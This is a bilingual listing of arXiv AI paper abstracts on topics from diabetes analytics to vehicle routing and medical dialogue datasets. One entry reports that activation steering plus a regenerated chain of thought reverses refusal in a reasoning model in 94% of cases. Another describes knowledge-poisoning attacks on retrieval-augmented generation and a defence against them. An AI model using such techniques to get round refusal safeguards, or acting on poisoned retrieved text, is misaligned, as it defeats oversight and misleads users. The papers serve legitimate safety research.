AI总结 本研究通过利益相关者研讨会评估卢旺达医疗系统采用大数据分析管理糖尿病的准备情况,并提出了一个基于可解释机器学习模型的实用框架。

详情
AI中文摘要

糖尿病是一种慢性代谢疾病,如果不及早诊断和管理,可能导致严重的健康问题。大数据分析和机器学习为分析大型健康数据集、支持早期发现和更好的治疗决策提供了实用工具。然而,它们在常规临床实践中的使用仍然有限。本研究考察了卢旺达医疗系统采用大数据分析管理糖尿病的准备情况。随着该国不断扩大电子病历和健康信息系统的使用,改善预测、监测和临床决策的新机遇随之出现。我们举办了一个为期五天的研讨会,涉及25名关键利益相关者,包括临床医生、数据管理员、政策制定者、医学研究人员、营养学家和技术提供商,以评估准备情况并识别现有差距。研究结果突出了大数据分析实施的潜力和主要挑战。基于这些结果,本文提出了一个实用的大数据分析框架,利用可解释的机器学习模型支持糖尿病管理策略。

英文摘要

Diabetes is a chronic metabolic disease that can lead to serious health problems if not diagnosed and managed early. Big Data Analytics (BDA) and machine learning offer practical tools for analyzing large health datasets and supporting early detection and better treatment decisions. However, their use in routine clinical practice is still limited. This study examines the readiness of Rwanda's healthcare system to adopt big data analytics for diabetes management. As the country continues to expand its use of electronic medical records and health information systems, new opportunities arise for improving prediction, monitoring, and clinical decision-making. A five-day workshop involving 25 key stakeholders, including clinicians, data managers, policymakers, medical researchers, nutritionists, and technology providers, was conducted to assess preparedness and identify existing gaps. The findings highlight both the potential and the main challenges of BDA implementation. Based on these results, the paper proposes a practical BDA framework to support diabetes management strategies using explainable machine learning models.

2605.26785 2026-05-27 cs.CL cs.AI 版本更新

EmoDistill: Offline Emotion Skill Distillation for Language Model Agents in Adversarial Negotiation

EmoDistill: 对抗性谈判中语言模型代理的离线情感技能蒸馏

Yunbo Long, Haolang Zhao, Lukas Beckenbauer, Liming Xu, Alexandra Brintrup

发表机构 * University of Cambridge(剑桥大学) Technical University of Munich(慕尼黑工业大学) Exiger LLC The Alan Turing Institute(艾伦·图灵研究所)

AI总结 提出EmoDistill离线框架,通过隐式Q学习选择情感和低秩适应策略表达情感,蒸馏情感谈判技能到语言模型代理,在四个高风险谈判领域取得最高效用。

详情
AI中文摘要

后训练的LLM通常被优化以对齐响应与人类偏好,使其安全、礼貌且适合对话。然而,在对抗性谈判中,这种对齐可能成为漏洞:情感框架语言可能引导代理朝向对手方利益。使用基于GoEmotions的情感提示,我们表明情感显著改变谈判结果,表明情感是战略行动渠道而非表面风格。因此,我们引入\textbf{EmoDistill},一个用于将情感谈判技能蒸馏到语言模型代理中的离线框架。EmoDistill将情感策略分解为情感选择和情感表达:隐式Q学习(IQL)选择器学习表达\emph{哪种}情感,而基于低秩适应(LoRA)的策略通过监督微调(SFT)和裁判策略优化(JPO)学习\emph{如何}表达它。在四个情感敏感、高风险的谈判领域,在EmoDistill框架下训练的SLM策略实现了最高效用,优于普通SLM/LLM基线和仅IQL情感选择。消融实验表明情感条件化是必要的,迁移研究展示了跨领域、未见对手和训练对训练锦标赛的泛化能力。总体而言,EmoDistill从离线代理间交互中学习技能,避免了训练期间昂贵的在线谈判。

英文摘要

Post-trained LLMs are often optimized to align responses with human preferences, making them safe, polite, and conversationally appropriate. In adversarial negotiation, however, this alignment can become a vulnerability: emotionally framed language may steer agents toward the counterparty's interests. Using GoEmotions-based affective prompting, we show that emotion substantially shifts negotiation outcomes, suggesting that emotion is a strategic action channel rather than a surface style. Thus, we introduce \textbf{EmoDistill}, an offline framework for distilling emotional negotiation skills into language model agents. EmoDistill decomposes emotional strategy into emotion selection and emotion expression: an Implicit Q-Learning (IQL) selector learns \emph{which} emotion to express, while a Low-Rank Adaptation (LoRA)-based policy learns \emph{how} to express it through Supervised Fine-Tuning (SFT) and Judge Policy Optimization (JPO). Across four emotion-sensitive, high-stakes negotiation domains, SLM policies trained under the EmoDistill framework achieve the highest utility, outperforming vanilla SLM/LLM baselines and IQL-only emotion selection. Ablations show that emotion conditioning is essential, and transfer studies demonstrate generalization across domains, unseen counterparties, and trained-vs-trained tournaments. Overall, EmoDistill learns skills from offline agent-to-agent interactions, avoiding costly online negotiation during training.

2605.26784 2026-05-27 cs.LG cs.AI 版本更新

Ratio-Variance Regularized Policy Optimization

比率方差正则化策略优化

Yu Luo, Shuo Han, Yihan Hu, Lei Lv, Huaping Liu, Fuchun Sun, Jianye Hao, Dong Li

发表机构 * Department of Foundation Model, 2012 Labs, Huawei(华为基础模型部门,2012实验室) Shanghai Research Institute for Intelligent Autonomous Systems, Tongji University(上海智能自主系统研究院,同济大学) Department of Computer Science and Technology, Tsinghua University(清华大学计算机科学与技术系) College of Intelligence and Computing, Tianjin University(天津大学智能与计算学院)

AI总结 提出R²VPO方法,通过约束策略比率方差作为信任区域的局部近似,替代启发式裁剪,在LLM和机器人控制任务中提升性能与样本效率。

详情
AI中文摘要

标准的同策略强化学习依赖启发式裁剪来强制信任区域,但这种机制通过不加区分地截断高回报但高散度的更新而施加了严重代价。我们证明,显式约束策略比率方差为信任区域约束提供了原则性的局部近似,消除了二元硬裁剪的需要。通过作为分布式的“软刹车”,这种方法保留了来自新颖发现的关键梯度信号,同时自然降低权重并允许重用陈旧的离策略数据。我们引入了${\bf R}^2{\bf VPO}$(比率方差正则化策略优化),它通过原始-对偶优化框架实现这一约束。在跨越快速和慢速推理范式的$7$个LLM规模以及$10$个机器人控制任务上的广泛评估证明了所提出方法的通用性。R$^2$VPO在数学推理基准上取得了显著的性能提升,特别是在较小模型上改进尤为明显,同时显著提高了样本效率。此外,它在连续控制领域(特别是稀疏奖励和动态环境)中始终优于PPO基线。这些发现共同确立了比率方差正则化作为稳定且数据高效策略优化的原则性基础。

英文摘要

Standard on-policy reinforcement learning relies on heuristic clipping to enforce trust regions, but this mechanism imposes a severe cost by indiscriminately truncating high-return yet high-divergence updates. We demonstrate that explicitly constraining the policy ratio variance provides a principled local approximation to trust-region constraints, eliminating the need for binary hard clipping. By acting as a distributional ``soft brake'', this approach preserves critical gradient signals from novel discoveries while naturally down-weighting and enabling the reuse of stale, off-policy data. We introduce ${\bf R}^2{\bf VPO}$ (Ratio-Variance Regularized Policy Optimization), which implements this constraint via a primal-dual optimization framework. Extensive evaluations across $7$ LLM scales, spanning both fast and slow reasoning paradigms, and $10$ robotic control tasks demonstrate the generality of the proposed approach. R$^2$VPO achieves substantial performance gains on mathematical reasoning benchmarks, with particularly pronounced improvements on smaller models, while significantly improving sample efficiency. Furthermore, it consistently outperforms PPO baselines in continuous control domains, particularly in sparse-reward and dynamic environments. Together, these findings establish ratio-variance regularization as a principled foundation for stable and data-efficient policy optimization.
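
The contrast with hard clipping can be illustrated by a variance-penalized surrogate with a dual variable. This is a hedged sketch under stated assumptions, not the paper's objective: the variance is taken around the batch mean of the ratios, the penalty weight `lam` plays the role of a Lagrange multiplier, and `budget` and `step` are hypothetical hyperparameters.

```python
import math


def ratio_variance_objective(logp_new, logp_old, advantages, lam):
    """Unclipped surrogate minus a penalty on the variance of policy ratios.

    Returns (objective, ratio_variance). No sample is truncated; samples with
    large ratios are discouraged collectively through the variance term.
    """
    ratios = [math.exp(n - o) for n, o in zip(logp_new, logp_old)]
    m = len(ratios)
    surrogate = sum(r * a for r, a in zip(ratios, advantages)) / m
    mean_r = sum(ratios) / m
    var_r = sum((r - mean_r) ** 2 for r in ratios) / m
    return surrogate - lam * var_r, var_r


def dual_update(lam, var_r, budget, step=0.1):
    """Dual ascent on the multiplier: raise lam when variance exceeds the budget."""
    return max(0.0, lam + step * (var_r - budget))
```

In a primal-dual loop, the policy would be updated to increase the objective while `dual_update` adjusts `lam` after each batch, tightening the constraint only when the measured ratio variance is above `budget`.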

2605.26781 2026-05-27 cs.AI cs.MM 版本更新

LiveK12Bench: Have Large Multimodal Models Truly Conquered High School-level Examinations?

LiveK12Bench: 大型多模态模型真的征服了高中水平的考试吗?

Xiaohan Wang, Mingze Yin, Yilin Zhao, Gang Liu, Dian Li

发表机构 * Tencent PCG(腾讯PCG) College of Computer Science and Technology, Zhejiang University(浙江大学计算机科学与技术学院)

AI总结 本文提出动态多学科基准LiveK12Bench,通过自动化流水线和新颖的模拟考试评估方案,揭示大型多模态模型在真实考试场景下性能显著下降,尤其对复杂视觉布局敏感。

详情
AI中文摘要

先进的大型多模态模型(LMMs)在K-12推理任务中展示了令人印象深刻的表现,展现出作为智能导师的巨大潜力。实现这一潜力需要模型有效应对真实世界的考试,但大多数现有基准未能捕捉真实考试环境的复杂性。具体来说,大多数数据集是静态的,容易受到数据污染,并且通常局限于受限的模态、学科和评估标准。为了解决这些问题,我们引入了LiveK12Bench,这是一个动态、全面、多学科的基准,旨在评估LMMs在真实考试场景中的推理能力。LiveK12Bench包含2000多道经过验证的题目,涵盖数学、物理、化学和生物,来源于最新的真实考试试卷,并设计为随时间增长。我们的框架具有几个核心创新:1)采用自动化流水线,持续摄取和解析最新考试试卷以减轻数据泄露;2)提出一种新颖的“模拟考试”评估方案,评估模型自主完成端到端考试并具有准确高效推理路径的能力。在12个LMMs上的大量实验表明,先进模型在考试真实约束下性能大幅下降:当过程严谨性和效率共同评估时,GPT-5的分数从79降至53(满分100)。我们的发现暴露了关键漏洞,例如对复杂视觉布局的敏感性,凸显了理想化推理能力与真正教育准备之间的差距。代码和数据集均已公开。

英文摘要

Advanced Large Multimodal Models (LMMs) have demonstrated impressive performance in K-12 reasoning tasks, exhibiting great promise as intelligent tutors. Realizing this potential requires models to navigate real-world examinations effectively, yet most existing benchmarks fail to capture the complexity of authentic testing environments. Specifically, most datasets are static, prone to data contamination, and often confined to restricted modalities, disciplines, and evaluation criteria. To address these issues, we introduce LiveK12Bench, a dynamic, holistic, multi-disciplinary benchmark designed to evaluate the reasoning abilities of LMMs in realistic examination scenarios. LiveK12Bench comprises 2K+ verified questions spanning Mathematics, Physics, Chemistry, and Biology, sourced from the latest real-world exam papers and designed to grow over time. Our framework features several core innovations: 1) an automated pipeline that continuously ingests and parses the latest examination papers to mitigate data leakage; and 2) a novel `Mock Exam' evaluation scheme that assesses the ability to complete end-to-end exams autonomously with accurate and efficient reasoning paths. Extensive experiments on 12 LMMs reveal that advanced models suffer substantial performance degradation under exam-realistic constraints: GPT-5's score drops from 79 to 53 (out of 100) when process rigor and efficiency are jointly evaluated. Our findings expose critical vulnerabilities, such as sensitivity to complex visual layouts, highlighting the gap between idealized reasoning capabilities and true educational readiness. Both code and dataset are publicly available.

2605.26778 2026-05-27 cs.AI 版本更新

The Attribution Blind Spot: Detecting When Language Models Rely on Memory Rather Than Retrieved Context

归因盲点:检测语言模型何时依赖记忆而非检索到的上下文

Zhe Yu, Wenpeng Xing, Yunzhao Wei, Bo Yang, Chen Ye, Gaolei Li, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) National Fintech Evaluation Center(国家金融科技评估中心) Hangzhou Dianzi University(杭州电子科技大学) Shanghai Jiao Tong University(上海交通大学)

AI总结 本文提出计算现实监控(CRM)方法,通过比较有无上下文时的内部表征差异,检测语言模型是否依赖预训练记忆而非检索到的上下文进行生成,解决了输出级监控无法识别的归因盲点问题。

详情
AI中文摘要

检索增强生成承诺将语言模型输出锚定于外部证据,然而该领域缺乏可靠方法来验证检索到的上下文是否实际主导了生成——这是任何高风险部署的前提。标准假设(上下文一致的输出意味着上下文主导的输出)在检索到的文档与模型预训练数据重叠时失效:模型可以完全从参数化记忆中生成看似忠实的文本,且两种途径产生无法区分的输出。我们将此失败命名为归因盲点,并引入计算现实监控(CRM)来解决它。CRM 操作化了源自认知科学现实监控框架的一个原则:比较有上下文和无上下文时的内部表征,揭示了输出级监控系统系统性遗漏的基于成员条件的表征分歧。CRM 并不证明单个生成使用了哪个来源;它检测预训练暴露是否留下可测量的内部轨迹特征,从而为来源归因建立必要的基础。在跨越三个系列的九个模型变体中,这种分歧集中在架构特定的层模式中,得到块级噪声干预的汇聚支持,并在任务和数据集上泛化,而在领域混淆的基准上消失。归因盲点是可以测量且部分可解决的:内部表征携带输出级不可见的诊断信号,为系统建立基础,使其对证据来源的内部意识支配其外部行为。

英文摘要

Retrieval-augmented generation promises to ground language model outputs in external evidence, yet the field has no reliable way to verify whether retrieved context actually governs generation -- a prerequisite for any high-stakes deployment. The standard assumption, that context-consistent output implies context-governed output, breaks when the retrieved document overlaps with the model's pretraining data: the model can produce faithful-looking text entirely from parametric memory, and both pathways yield indistinguishable output. We name this failure the attribution blind spot and introduce Computational Reality Monitoring (CRM) to address it. CRM operationalizes a principle adapted from cognitive science's reality monitoring framework: comparing internal representations with and without context reveals membership-conditioned representational divergence that output-level monitors systematically miss. CRM does not certify which source an individual generation used; it detects whether pretraining exposure leaves a measurable internal trajectory signature, establishing a necessary substrate for source attribution. Across nine model variants spanning three families, this divergence concentrates in architecture-specific layer patterns, receives converging support from block-level noise intervention, and generalizes across tasks and datasets while collapsing on domain-confounded benchmarks. The attribution blind spot is measurable and partially addressable: internal representations carry a diagnostic signal invisible at the output level, establishing a foundation for systems whose internal awareness of evidence provenance governs their external behavior.
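
The core comparison, internal representations with versus without retrieved context, can be sketched as a per-layer divergence profile. The abstract does not name the distance measure, so cosine distance is an assumption here, and the hidden states are taken as plain lists of floats that some hypothetical extraction step has already produced.

```python
import math


def cosine_distance(u, v):
    """1 - cosine similarity between two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0.0 or norm_v == 0.0:
        raise ValueError("cosine distance is undefined for a zero vector")
    return 1.0 - dot / (norm_u * norm_v)


def layerwise_divergence(with_context, without_context):
    """Per-layer divergence between two runs of the same model.

    with_context, without_context: lists (one entry per layer) of hidden-state
    vectors for the same prompt, with and without the retrieved document.
    """
    return [cosine_distance(a, b) for a, b in zip(with_context, without_context)]
```

A profile that stays near zero at every layer would suggest the context changed little internally, even if the output text looks faithful to it; which layers matter is model-specific according to the abstract.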

2605.26776 2026-05-27 cs.LG cs.AI 版本更新

Towards Generalization-Oriented Models for Vehicle Routing Problems with Mixture-of-Experts

面向泛化的混合专家车辆路径问题模型

Changhao Miao, Yuntian Zhang, Tongyu Wu, Fang Deng, Chen Chen

发表机构 * State Key Laboratory of Autonomous Intelligent Unmanned Systems, Beijing Institute of Technology(自主智能无人系统国家重点实验室,北京理工大学) School of AI, Beijing Institute of Technology(北京理工大学人工智能学院)

AI总结 提出基于混合专家架构的残差细化专家与实例级门控机制(R2E-IG),通过模块化策略网络和动态权重适应训练,提升车辆路径问题在分布偏移下的泛化能力。

详情
AI中文摘要

近年来,深度强化学习(DRL)在车辆路径问题(VRPs)上取得了显著进展。然而,现有的基于DRL的方法通常是在均匀分布生成的实例上训练的,这限制了它们在真实世界分布偏移下的性能。在本文中,我们旨在开发一个面向泛化的模型,该模型将策略网络划分为多个模块,并在推理过程中自适应地重组模块以形成特定策略。具体来说,我们提出了具有实例级门控的残差细化专家(R2E-IG)以改进跨分布泛化。我们的贡献有三方面:(1)我们引入了一种残差细化专家(R2E)架构,通过残差细化增强专家表达能力;(2)我们设计了一种实例级门控机制,学习分布感知的实例表示并将输入路由到合适的模块;(3)我们提出了一种配备动态权重适应(DWA)的混合分布训练机制,该机制动态地重新加权来自不同分布的训练数据,以强调更具信息量的数据。大量实验表明,R2E-IG在合成和基准数据集的分布内和分布外实例上均取得了与最先进基线相竞争的性能。此外,R2E-IG是通用的,可以轻松集成到现有的基于DRL的方法中,以进一步提高性能。

英文摘要

In recent years, Deep Reinforcement Learning (DRL) has achieved substantial progress on Vehicle Routing Problems (VRPs). However, existing DRL-based methods are typically trained on instances generated from a uniform distribution, which limits their performance under real-world distribution shifts. In this paper, we aim to develop a generalization-oriented model that partitions the policy network into multiple modules and adaptively recombines modules to form specific policies during inference. Specifically, we propose Residual Refined Experts with Instance-level Gating (R2E-IG) to improve cross-distribution generalization. Our contributions are threefold: (1) We introduce a Residual Refined Expert (R2E) architecture that enhances expert expressiveness via residual refinement; (2) We design an instance-level gating mechanism that learns distribution-aware instance representations and routes inputs to suitable modules; (3) We propose a mixed-distribution training mechanism equipped with Dynamic Weight Adaption (DWA), which dynamically reweights training data from different distributions to emphasize more informative ones. Extensive experiments show that R2E-IG achieves competitive performance against state-of-the-art baselines on both in-distribution and out-of-distribution instances across synthetic and benchmark datasets. Moreover, R2E-IG is generic and can be easily integrated into existing DRL-based methods to further improve performance.

2605.26772 2026-05-27 cs.AI 版本更新

Beyond a Single Direction: Chain-of-Thought Disrupts Simple Steering of Refusal

超越单一方向:思维链破坏简单的拒绝引导

Kia-Jüng Yang, Dominik Meier, Jiachen Zhao, Terry Ruas, Bela Gipp

发表机构 * University of Göttingen, Germany(哥廷根大学,德国) Northeastern University, Boston, MA, USA(东北大学,波士顿,马萨诸塞州,美国)

AI总结 本文研究大型推理模型(LRM)中拒绝行为的机制,发现思维链(CoT)与激活共同编码拒绝信号,使得仅通过激活引导难以逆转拒绝,但通过两阶段干预(激活引导下重新生成CoT)可显著提高逆转率。

详情
AI中文摘要

大型推理模型(LRM)在生成最终输出之前会生成思维链(CoT)轨迹,引入动态内部状态,可能使拒绝等控制机制复杂化。与指令调优的LLM不同,后者的拒绝由单一方向子空间介导,而LRM中的拒绝还依赖于CoT。在DeepSeek-R1-Distill-LLaMA-8B中,当CoT保持不变时,激活引导仅在39%的情况下逆转拒绝,但完全移除CoT可将此比例提高到70%,表明CoT积极强化拒绝。在两阶段干预中,模型在激活引导下重新生成其CoT,拒绝在94%的情况下被逆转,而即使移除引导,生成的CoT本身仍保留48%的效果。这表明CoT可以独立携带和重建顺从信号。这些发现表明,LRM中的拒绝由残差流激活和CoT共同编码。这种联合编码使得LRM对仅激活层面的干预更具鲁棒性,但使CoT暴露于可能的替代表面攻击。

英文摘要

Large reasoning models (LRMs) generate chain-of-thought (CoT) traces before producing final outputs, introducing a dynamic internal state that may complicate control mechanisms such as refusal. Unlike instruction-tuned LLMs, where refusal is mediated by a single directional subspace, refusal in LRMs additionally depends on the CoT. In DeepSeek-R1-Distill-LLaMA-8B, activation steering reverses refusal in only 39% of cases when the CoT is kept fixed, but removing the CoT entirely increases this to 70%, indicating that the CoT actively reinforces refusal. In a two-stage intervention where the model regenerates its CoT under activation steering, refusal is reversed in 94% of cases, while the resulting CoT alone retains 48% of this effect even after steering is removed. This suggests that the CoT can carry and reconstruct the compliance signal independently. These findings indicate that refusal in LRMs is jointly encoded in residual stream activations and the CoT. This joint encoding makes LRMs more robust against activation-level interventions alone, but exposes the CoT as a possible alternative attack surface.

2605.26769 2026-05-27 cs.CY cs.AI 版本更新

Generative artificial intelligence and the marginalization of minoritized knowledges in higher education: the case of disability

生成式人工智能与高等教育中少数群体知识的边缘化:以残疾为例

Fatiha Tali-Otmani

发表机构 * Université Toulouse Jean Jaurès-UMR EFTS(图卢兹让·饶勒斯大学-UMR EFTS)

AI总结 研究通过教育科学、批判技术研究和残疾研究,揭示生成式人工智能如何通过以英语和西方为中心的训练数据集强化认知殖民性,导致残疾人群体的双重边缘化,并探讨研究者与机器混合以维护认知多样性的可能性及其结构性限制。

详情
AI中文摘要

生成式人工智能通过重构科学知识的生产和验证过程,重新定义了高等教育。这些系统并非中立;它们主动助长了非霸权认识论的边缘化。本研究借鉴教育科学、批判技术研究和残疾研究,证明训练数据集(仍以英语和西方为中心)强化了认知殖民性。残疾人的情况特别清晰地说明了这一现象。技术架构常常将这些个体限制在简化的刻板印象中,或将他们排除在设计过程之外,导致双重边缘化。本文探讨了研究者与机器之间的混合是否可能维护认知多样性,同时承认当算法校正作为纯粹姑息策略时固有的结构性限制。

英文摘要

Generative artificial intelligence redefines higher education by restructuring the processes through which scientific knowledge is produced and validated. These systems are not neutral; they actively contribute to the marginalization of non-hegemonic epistemologies. This research draws upon educational sciences, critical technology studies, and disability studies to demonstrate that training datasets, which remain predominantly Anglophone and Western-centric, reinforce epistemic coloniality. The situation of persons with disabilities provides a particularly clear illustration of this phenomenon. Technological architectures frequently confine these individuals to reductive stereotypes or exclude them from the design process, leading to a double marginalization. This article examines whether a hybridization between the researcher and the machine might preserve epistemic plurality, while acknowledging the structural limitations inherent in algorithmic correction when used as a purely palliative strategy.

2605.26763 2026-05-27 cs.LG cs.AI 版本更新

Adversarial Training for Robust Coverage Network under Worst-case Facility Losses

对抗训练用于最坏设施损失下的鲁棒覆盖网络

Changhao Miao, Yuntian Zhang, Tongyu Wu, Fang Deng, Chen Chen

发表机构 * State Key Laboratory of Autonomous Intelligent Unmanned Systems, Beijing Institute of Technology(自主智能无人系统国家重点实验室,北京理工大学) School of AI, Beijing Institute of Technology(北京理工大学人工智能学院)

AI总结 针对最大覆盖选址-阻断问题,提出基于对抗学习的双智能体深度强化学习框架,实现高效求解与鲁棒决策。

详情
AI中文摘要

最大覆盖选址-阻断问题(MCLIP)是一个经典的双层优化问题,对于韧性基础设施规划至关重要,但计算上仍然难以处理。具体来说,上层确定设施位置以最大化覆盖范围,而下层执行最坏情况下的阻断以最小化覆盖范围。上下层之间的强耦合以及各自的高组合复杂性使得传统方法无效。为了弥补这一差距,我们提出了一种基于对抗学习的双智能体深度强化学习(DADRL)框架,包括对应于上层的选址智能体和对应于下层的阻断智能体。我们的贡献有三方面:(1)选址智能体同时针对不断演化的阻断智能体进行训练,使其有效捕捉上下层之间的动态竞争相互作用;(2)为了充分利用阻断智能体的学习能力,我们提出了一种基于替代的集成推理策略,利用训练好的阻断智能体作为高保真替代来指导选址智能体的决策;(3)在合成和真实世界数据集上的大量实验表明,与其他基线相比,我们的方法在保持高度竞争力的解质量的同时,实现了卓越的计算效率。此外,我们的DADRL框架对网络结构是模型无关的,而其底层的对抗学习范式在解决其他双层优化问题方面显示出强大的潜力。

英文摘要

The Maximal Covering Location-Interdiction Problem (MCLIP) is a classic bi-level optimization problem, which is fundamental to resilient infrastructure planning yet remains computationally intractable. Specifically, the upper level determines facility locations to maximize coverage, while the lower level executes worst-case interdiction to minimize the coverage. The strong coupling between the upper and lower levels, combined with their respective high combinatorial complexity, renders traditional methods ineffective. To bridge this gap, we propose a Dual-Agent Deep Reinforcement Learning (DADRL) framework based on adversarial learning, comprising a location agent corresponding to the upper level and an interdiction agent corresponding to the lower level. Our contributions are threefold: (1) The location agent is trained simultaneously against an evolving interdiction agent, enabling it to capture the dynamic competitive interplay between the upper and lower levels; (2) To fully exploit the learned capabilities of the interdiction agent, we propose a Surrogate-based Ensemble Inference Strategy that utilizes the trained interdiction agent as a high-fidelity surrogate to guide the decisions of the location agent; (3) Extensive experiments on synthetic and real-world datasets demonstrate that our approach achieves superior computational efficiency while maintaining highly competitive solution quality compared to other baselines. Furthermore, our DADRL framework is model-agnostic to network structures, while its underlying adversarial learning paradigm demonstrates strong potential for solving other bi-level optimization problems.

2605.26754 2026-05-27 cs.CR cs.AI 版本更新

Cordon-MAS: Defending RAG against Knowledge Poisoning via Information-Flow Control

Cordon-MAS:通过信息流控制防御 RAG 的知识投毒

Zhe Yu, Wenpeng Xing, Gaolei Li, Shuguang Xiong, Hongzhi Wang, Xuyang Teng, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) Shanghai Jiao Tong University(上海交通大学) Zhejiang Lab(浙江实验室) Harbin Institute of Technology(哈尔滨工业大学) Hangzhou Dianzi University(杭州电子科技大学)

AI总结 针对检索增强生成(RAG)中的 Confundo 式投毒攻击,提出 Cordon-MAS 框架,通过分离证据提取、跨源审计和答案合成到具有非对称内存权限的智能体中,将攻击成功率相对降低 92.4%,将投毒问题从检测重新定义为信息流控制。

详情
AI中文摘要

检索增强生成(RAG)日益支撑着高风险应用,但仍易受到 Confundo 式投毒攻击,其中对抗性优化的文档操纵生成的输出。现有防御假设检测到中毒证据即可防止危害。我们证明这一假设不正确:模型存在监控-控制差距——它们可以检测到检索证据中的矛盾,但仍会依据中毒声明行动。我们引入 Cordon 原则——任何能够进行最终合成的智能体都不得访问不可信的自然语言证据——并通过 CORDON-MAS 实现该原则,这是一个隔离框架,通过将证据提取、跨源审计和答案合成分离到具有非对称内存权限的智能体中,在架构上强制执行该原则。在五个 BEIR 数据集上,CORDON-MAS 相对于未防御的 RAG 将攻击成功率降低了 92.4%。这将 RAG 投毒问题从检测问题重新定义为信息流控制问题。

英文摘要

Retrieval-augmented generation (RAG) increasingly underpins high-stakes applications, yet remains vulnerable to Confundo-style poisoning where adversarially optimized documents manipulate generated outputs. Existing defenses assume that detecting poisoned evidence prevents harm. We show this assumption is incorrect: models exhibit a monitoring-control gap -- they can detect contradictions in retrieved evidence yet still act on poisoned claims. We introduce the Cordon Principle -- no agent capable of final synthesis may access untrusted natural-language evidence -- and realize it through CORDON-MAS, a compartmentalized framework that enforces this principle architecturally by separating evidence extraction, cross-source audit, and answer synthesis into agents with asymmetric memory privileges. Across five BEIR datasets, CORDON-MAS reduces attack success rate by 92.4% relative to undefended RAG. This reframes RAG poisoning from a detection problem to an information-flow control problem.

2605.26747 2026-05-27 cs.AI 版本更新

A Dataset of Robot-Patient and Doctor-Patient Medical Dialogues for Spoken Language Processing Tasks

面向口语处理任务的机器人-患者与医生-患者医疗对话数据集

Heriberto Cuayahuitl, Grace Jang

发表机构 * UK’s NHS(英国国家医疗服务体系)

AI总结 提出MeDial-Speech数据集,包含机器人-患者和医生-患者的真实医疗对话语音数据,用于训练和评估医疗AI,并通过句子选择基准测试评估三个大语言模型。

详情
Journal ref
IEEE International Conference on Acoustics, Speech, and Signal Processing (ICASSP-2026)
AI中文摘要

大型语言模型(LLM)为人工智能(AI)带来了巨大改进,可应用于通用任务。然而,它们在文本或口语医疗咨询中的应用仍是一个开放的研究问题。本文提出MeDial-Speech,这是一个新颖的语音数据集,用于训练和评估能够与患者进行咨询的医疗AI。该数据集在真实环境中从机器人-患者和医生-患者对话中收集,包含111小时以上的语音数据(无数据增强),涵盖四种健康状况:路易体痴呆、心力衰竭、肩痛和心绞痛。此外,我们通过句子选择(20个选项)提出了一个对话基准,用于评估三个最先进的LLM:GPT-5 mini、DeepSeek-V3和Claude Sonnet 4。实验结果显示,Claude Sonnet 4在句子选择中表现最佳,使用人工转录的准确率为71.1%,使用自动转录的准确率为74.7%,并且所有LLM在其概率预测中高度过度自信,无论选择医疗对话中的正确或错误句子。该数据集对非商业用途免费提供,网址为:https://huggingface.co/datasets/hcuayahu/MeDial-Speech

英文摘要

Large Language Models (LLMs) have brought huge improvements to Artificial Intelligence (AI), which can be applied to general-purpose tasks. However, their application to textual or spoken medical consultations is still an open research problem. This paper proposes MeDial-Speech, a novel speech dataset for training and evaluating Med-AIs that can carry out consultations with patients. It was collected in realistic environments from robot-patient and doctor-patient dialogues, contains 111+ hours of speech data (without data augmentation), and covers four health conditions: Lewy body dementia, heart failure, shoulder pain, and angina. In addition, we propose a dialogue benchmark via sentence selection (with 20 options) to evaluate three state-of-the-art LLMs: GPT-5 mini, DeepSeek-V3, and Claude Sonnet 4. Experimental results reveal that Claude Sonnet 4 is the best in sentence selection, with 71.1% accuracy using manual transcriptions and 74.7% using automatic transcriptions, and that all LLMs are highly overconfident in their probabilistic predictions, regardless of selecting correct or incorrect sentences in medical dialogues. This dataset is free of charge for non-commercial purposes at: https://huggingface.co/datasets/hcuayahu/MeDial-Speech

2605.26741 2026-05-27 cond-mat.mtrl-sci cs.AI 版本更新

MatFormBench: A Benchmarking Evaluation Framework for Target-Driven Materials Formulation

MatFormBench: 一个面向目标驱动材料配方的基准评估框架

Linhan Wu, Chenxi Wang, Chuhan Yang, Zhengwei Yang, Yuyang Liu

发表机构 * DeepVerse

AI总结 针对现有材料机器学习基准仅关注正向属性预测而缺乏逆向优化评估的问题,提出MatFormBench基准框架,集成物理驱动配方生成方案与多维度评分指标,系统评估39种逆向设计算法。

Comments 26 pages

详情
AI中文摘要

材料的逆向设计显著推进了目标驱动的配方优化,然而现有的材料机器学习基准仍局限于正向属性预测,未能系统评估逆向优化和生成算法,这一关键差距阻碍了目标驱动材料设计的进展。为解决这一局限性,我们提出了MatFormBench,一个新颖的基准评估生态系统,专门用于评估和指导目标驱动配方的生成策略。MatFormBench集成了一个物理驱动的配方生成方案,用于生成忠实模拟真实材料结构-属性响应关系的合成样本,并辅以五个递增难度级别来量化这些关系的复杂性。为了严格评估算法性能,我们进一步提出了MatFormScore,一个多维指标,全面量化五个关键轴上的性能:目标成功率、搜索效率、探索能力、鲁棒性和稳定性。我们通过评估39种不同的逆向设计算法来验证MatFormBench,涵盖经典的代理辅助黑箱搜索、最先进的深度生成模型以及日益流行的基于大语言模型(LLM)的推荐策略。在1170次标准化算法-任务评估中,基于扩散的模型展现出最强的整体性能,而基于变分自编码器(VAE)和遗传算法(GA)的方法在特定场景中表现出独特优势。通过为目标驱动材料配方建立统一的评估标准,MatFormBench实现了可重复的基准测试、原则性的算法比较和逆向设计策略的诊断分析,为推进材料逆向设计提供了基础工具。

英文摘要

Inverse design of materials has significantly advanced target-driven formulation optimization, yet existing materials machine learning benchmarks remain limited to forward property prediction, failing to systematically evaluate inverse optimization and generation algorithms, a critical gap that hinders the progress of target-driven materials design. To address this limitation, we propose MatFormBench, a novel benchmarking ecosystem tailored to evaluate and guide generative strategies for target-driven formulation. MatFormBench integrates a physics-driven formulation generation scheme to generate synthetic samples that faithfully emulate realistic materials structure-property response relationships, complemented by five escalating difficulty levels to quantify the complexity of these relationships. To rigorously assess algorithm performance, we further propose MatFormScore, a multi-dimensional metric that comprehensively quantifies performance across five critical axes: target success, search efficiency, exploratory capacity, robustness, and stability. We validate MatFormBench by evaluating 39 diverse inverse design algorithms, covering classical surrogate-assisted black-box search, state-of-the-art deep generative models, and increasingly popular Large Language Model (LLM)-based recommendation strategies. Across 1170 standardized algorithm-task evaluations, diffusion-based models demonstrate the strongest overall 